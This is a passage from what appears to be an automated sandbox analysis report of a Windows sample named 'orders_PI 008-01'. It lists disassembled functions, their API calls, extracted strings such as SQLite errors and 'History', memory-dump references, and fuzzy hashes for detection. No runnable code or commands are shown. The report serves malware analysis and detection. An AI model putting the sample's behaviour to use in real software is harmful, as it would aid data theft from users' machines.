                                        • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                        Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                        • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                        • free.MSVCRT ref: 0041822B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PathTemp$free
                                        • String ID: %s\etilqs_$etilqs_
                                        • API String ID: 924794160-1420421710
                                        • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                        • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                        Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040FDD5
                                          • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                        • _snwprintf.MSVCRT ref: 0040FE1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                        • String ID: <%s>%s</%s>$</item>$<item>
                                        • API String ID: 1775345501-2769808009
                                        • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                        • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                        • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                        • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                        Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wcscpy.MSVCRT ref: 0041477F
                                        • wcscpy.MSVCRT ref: 0041479A
                                        • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                        • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$CloseCreateFileHandle
                                        • String ID: General
                                        • API String ID: 999786162-26480598
                                        • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                        • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                        • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                        • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                        Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                        • _snwprintf.MSVCRT ref: 0040977D
                                        • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ErrorLastMessage_snwprintf
                                        • String ID: Error$Error %d: %s
                                        • API String ID: 313946961-1552265934
                                        • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                        • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                        Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: foreign key constraint failed$new$oid$old
                                        • API String ID: 0-1953309616
                                        • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                        • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                        • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                        • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                        Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                        • API String ID: 3510742995-272990098
                                        • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                        • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                        Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0044A6EB
                                        • memset.MSVCRT ref: 0044A6FB
                                        • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                        • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: gj
                                        • API String ID: 1297977491-4203073231
                                        • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                        • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                        Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                        • free.MSVCRT ref: 0040E9D3
                                          • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@$free
                                        • String ID:
                                        • API String ID: 2241099983-0
                                        • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                        • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                        Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                        • malloc.MSVCRT ref: 004174BD
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                        • free.MSVCRT ref: 004174E4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                        • String ID:
                                        • API String ID: 4053608372-0
                                        • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                        • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                        Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetParent.USER32(?), ref: 0040D453
                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$Rect$ClientParentPoints
                                        • String ID:
                                        • API String ID: 4247780290-0
                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                        Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                        • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                        • memset.MSVCRT ref: 004450CD
                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                        • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                        • String ID:
                                        • API String ID: 1471605966-0
                                        • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                        • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                        Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcscpy.MSVCRT ref: 0044475F
                                        • wcscat.MSVCRT ref: 0044476E
                                        • wcscat.MSVCRT ref: 0044477F
                                        • wcscat.MSVCRT ref: 0044478E
                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                          • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                        • String ID: \StringFileInfo\
                                        • API String ID: 102104167-2245444037
                                        • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                        • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                        Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??3@
                                        • String ID:
                                        • API String ID: 613200358-0
                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                        Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(00000000), ref: 00401990
                                        • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                        • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: MetricsSystem$PlacementWindow
                                        • String ID: AE
                                        • API String ID: 3548547718-685266089
                                        • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                        • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                        • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                        • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                        Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _memicmpwcslen
                                        • String ID: @@@@$History
                                        • API String ID: 1872909662-685208920
                                        • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                        • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                        • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                        • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                        Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004100FB
                                        • memset.MSVCRT ref: 00410112
                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                        • _snwprintf.MSVCRT ref: 00410141
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                        • String ID: </%s>
                                        • API String ID: 3400436232-259020660
                                        • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                        • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                        Function 0040E758 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040E770
                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
